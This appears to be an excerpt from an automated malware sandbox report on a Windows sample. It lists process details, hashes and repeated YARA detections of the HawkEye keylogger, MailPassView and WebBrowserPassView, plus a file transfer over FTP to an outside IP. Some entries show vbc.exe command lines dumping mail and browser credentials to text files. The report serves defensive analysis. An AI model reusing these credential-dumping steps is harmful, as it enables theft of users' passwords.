Mar 11, 2022 11:57:06.608611107 CET | 21 | 49782 | 66.70.204.222 | 192.168.2.4 | 226-File successfully transferred
 | | | | | 226 0.109 seconds (measured here), 13.83 Kbytes per second


                                                                                                                                                      Target ID:1
                                                                                                                                                      Start time:11:56:10
                                                                                                                                                      Start date:11/03/2022
                                                                                                                                                      Path:C:\Users\user\Desktop\TGQfHfehsY.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\Desktop\TGQfHfehsY.exe"
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:663994 bytes
                                                                                                                                                      MD5 hash:9B8EC9E094676D88B02F038F318AFD86
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:low

                                                                                                                                                      Target ID:3
                                                                                                                                                      Start time:11:56:11
                                                                                                                                                      Start date:11/03/2022
                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\pjavpo.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\pjavpo.exe C:\Users\user\AppData\Local\Temp\brtwja
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:120320 bytes
                                                                                                                                                      MD5 hash:1294A9DDC96CAC3F16FAE32EA9D6670D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                                                      • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000003.00000002.246555259.00000000020E0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      Reputation:low

                                                                                                                                                      Target ID:5
                                                                                                                                                      Start time:11:56:13
                                                                                                                                                      Start date:11/03/2022
                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\pjavpo.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\pjavpo.exe C:\Users\user\AppData\Local\Temp\brtwja
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:120320 bytes
                                                                                                                                                      MD5 hash:1294A9DDC96CAC3F16FAE32EA9D6670D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000002.497729162.0000000004A22000.00000040.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000005.00000002.500841796.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp, Author: Arnim Rupp
                                                                                                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                                                      • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000002.492406178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000005.00000002.500849311.0000000007BF0000.00000004.08000000.00040000.00000000.sdmp, Author: Arnim Rupp
                                                                                                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000000.244278596.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000002.497425736.0000000003801000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                                                      • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, Author: Arnim Rupp
                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000002.497655109.0000000004990000.00000004.08000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000000.242486618.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000000.242486618.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000000.242486618.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000000.242486618.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000000.242486618.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000002.497590428.0000000004908000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

Target ID: 12
Start time: 11:56:44
Start date: 11/03/2022
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt"
Imagebase: 0x7ff7748d0000
File size: 1171592 bytes
MD5 hash: C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000C.00000000.306975405.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000C.00000002.310652543.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000C.00000000.306290437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000C.00000000.305733767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation: high

Target ID: 13
Start time: 11:56:45
Start date: 11/03/2022
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"
Imagebase: 0x400000
File size: 1171592 bytes
MD5 hash: C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000D.00000000.307280478.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000D.00000000.306589441.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000D.00000000.306007276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000D.00000002.332740364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation: high

No disassembly